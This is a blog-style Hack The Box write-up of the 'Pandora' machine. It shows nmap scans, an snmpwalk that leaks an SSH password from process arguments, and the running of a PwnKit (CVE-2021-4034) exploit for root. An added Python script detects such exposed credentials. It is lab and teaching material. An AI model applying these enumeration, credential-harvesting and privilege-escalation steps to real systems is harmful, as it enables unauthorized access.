0xDamian
4 min read · Apr 7, 2022

Pandora — HTB(Hack The Box) Write-up

Pandora card info

Network Enumeration

I started with an nmap scan for services and version detection, found OpenSSH, and when you see that, you have to hammer on it.

$ sudo nmap -sC -sV 10.10.11.136 -Pn -oN nmap_all.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 00:03 WAT
Nmap scan report for 10.10.11.136
Host is up (0.37s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 was running Apache, so I decided to check the site. After “fiddling with it” and achieving absolutely nothing, I decided to run another scan just in case I missed something.
— Fiddling with it: I got on the site, checked for a login page, did some directory enumeration, and none of those were useful.

I put panda.htb in /etc/hosts and ran the nmap scan.

10.10.11.136 panda.htb

This time, I used different triggers that have helped me whilst playing on some VulnHub machines, and I found something I had no idea about: SNMP.

$ sudo nmap -sU -sV -top-ports=20 panda.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 00:27 WAT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
Service Info: Host: pandora

Exploiting

What’s SNMP? I did some research.

The Simple Network Management Protocol (SNMP) is an Internet Standard protocol that is based on the manager/agent model with a simple request/response format. The network manager issues a request and the managed agents will send responses in return.

Although it accomplished its goal of being an open, standard protocol, it was found to be lacking in key areas for certain managing applications. For example, it only supports 32-bit counters and has poor security features — a community string is the only security method in the SNMPv1.
Source: https://www.dpstele.com/snmp/v1-v2c-v3-difference.php

So basically… it’s showing me requests from a computer in plaintext? LOL
Naturally, I decided to find a way to exploit this and found a tool called snmpwalk. After reading its docs, I found out it just needed the following parameters: the SNMP version, the community string (public, private), and the target.

The result was really, really messy, but I found something really gooooood.

$ snmpwalk -v 1 -c public panda.htb | tee snmpwalk.txt
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (4102551) 11:23:45.51
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.25.4.2.1.5.824 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.839 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.841 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p [REDACTED]'"
iso.3.6.1.2.1.25.4.2.1.5.850 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.851 = ""
iso.3.6.1.2.1.25.4.2.1.5.853 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.855 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.949 = ""
iso.3.6.1.2.1.25.4.2.1.5.957 = STRING: "-o -p -- \\u --noclear tty1 linux"

Yep, the SSH login!

iso.3.6.1.2.1.25.4.2.1.5.841 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p [REDACTED]'"
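The reason this walk leaked a password is that net-snmp's HOST-RESOURCES-MIB exposes every process's argument string (hrSWRunParameters, 1.3.6.1.2.1.25.4.2.1.5.<pid>) to anyone who knows the read-only community. The script below is an added example, not part of the original write-up or any tool it uses: it parses snmpwalk output and flags command lines that carry a secret as an argument, masking the value so the report itself does not leak it. The flag list and the "-p" disambiguation rule are assumptions made for this example, and the sample rows are constructed from the (already redacted) output above.

```python
import re

# Prefix of HOST-RESOURCES-MIB hrSWRunParameters (1.3.6.1.2.1.25.4.2.1.5.<pid>): per-process argument strings.
HR_SW_RUN_PARAMETERS = "iso.3.6.1.2.1.25.4.2.1.5."
# Flags that commonly carry a secret inline (the list is an assumption for this example).
SECRET_FLAG_RE = re.compile(r"(?:^|\s)(-p|--password|--pass|--token|--secret)(?:=|\s+)(\S+)")
USER_FLAG_RE = re.compile(r"(?:^|\s)(?:-u|--user(?:name)?)(?:=|\s+)\S+")

def parse_snmpwalk(text):
    """Turn snmpwalk lines into (oid, value) pairs; non-STRING values are kept raw."""
    rows = []
    for line in text.splitlines():
        if " = " not in line:
            continue
        oid, rhs = line.split(" = ", 1)
        if rhs.startswith('STRING: "') and rhs.endswith('"'):
            value = rhs[len('STRING: "'):-1]
        elif rhs == '""':
            value = ""
        else:
            value = rhs  # OID:, INTEGER:, Timeticks: etc. are kept as-is
        rows.append((oid.strip(), value))
    return rows

def find_exposed_credentials(text):
    """Return process command lines (by PID) that pass a secret as an argument, secret masked."""
    findings = []
    for oid, cmdline in parse_snmpwalk(text):
        if not oid.startswith(HR_SW_RUN_PARAMETERS):
            continue
        pid = int(oid[len(HR_SW_RUN_PARAMETERS):])
        for match in SECRET_FLAG_RE.finditer(cmdline):
            flag, secret = match.group(1), match.group(2).rstrip("'\"")
            # "-p" is ambiguous (pid file, port, password): count it only when the same command
            # also names a user and the value is not a path (cf. snmpd's own "-p /run/snmpd.pid").
            if flag == "-p" and (not USER_FLAG_RE.search(cmdline) or secret.startswith("/")):
                continue
            if not secret or secret.startswith("-"):
                continue
            findings.append({"pid": pid, "flag": flag, "cmdline": cmdline.replace(secret, "*" * 8)})
    return findings

# Constructed sample: hrSWRunParameters rows from the walk above, password already redacted.
SAMPLE_WALK = r'''iso.3.6.1.2.1.25.4.2.1.5.841 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p [REDACTED]'"
iso.3.6.1.2.1.25.4.2.1.5.850 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.957 = STRING: "-o -p -- \\u --noclear tty1 linux"'''

if __name__ == "__main__":
    for finding in find_exposed_credentials(SAMPLE_WALK):
        print(f"PID {finding['pid']}: secret passed via {finding['flag']} in: {finding['cmdline']}")
```

Only PID 841 is reported; snmpd's "-p /run/snmpd.pid" and agetty's "-p --" are correctly left alone. The fix on the host side is to stop passing credentials on the command line (and to not expose the host-resources tree to a default "public" community at all).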

After logging in, I found out there was this executable called linpeas.sh, and it’s one of my favourite things. What it does is search for possible paths that would lead to privesc (privilege escalation).
You can find the tool here: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

daniel@pandora:~$ ls
"DON'T REMOVE" tmp
daniel@pandora:~$ cd tmp/
daniel@pandora:~/tmp$ ls
CVE-2021-4034-main cve.zip lin.log linpeas.sh

I ran it and behold! It had CVE-2021-4034 aka Pwnkit.

Screenshot of what I found after running linpeas.sh

Cool! Apparently, the exploit was also there. You could copy these tools over to the machine, by the way; I just happened to find them there.

daniel@pandora:~/tmp/CVE-2021-4034-main$ ./cve-2021-4034
ls
'GCONV_PATH=.' Makefile cve-2021-4034 cve-2021-4034.sh gconv-modules pwnkit.so
LICENSE README.md cve-2021-4034.c dry-run pwnkit.c
# cd ..

Boom, I’ve got root.
Located the user.txt and root.txt and submitted the flags.

What I Learnt From This Box

I saw something that I’ve never seen before on a machine. Sure, I was intimidated and clueless, but I was excited that doing research is actually really helpful. Yes, Googling is part of the hacking process and don’t let anyone tell you otherwise.
I would never have discovered these tools which helped me exploit SNMP, such as snmpwalk & snmpcheck, without the vast knowledge of the internet being just a Google search away.

I hope you enjoyed this writeup. Happy hacking!
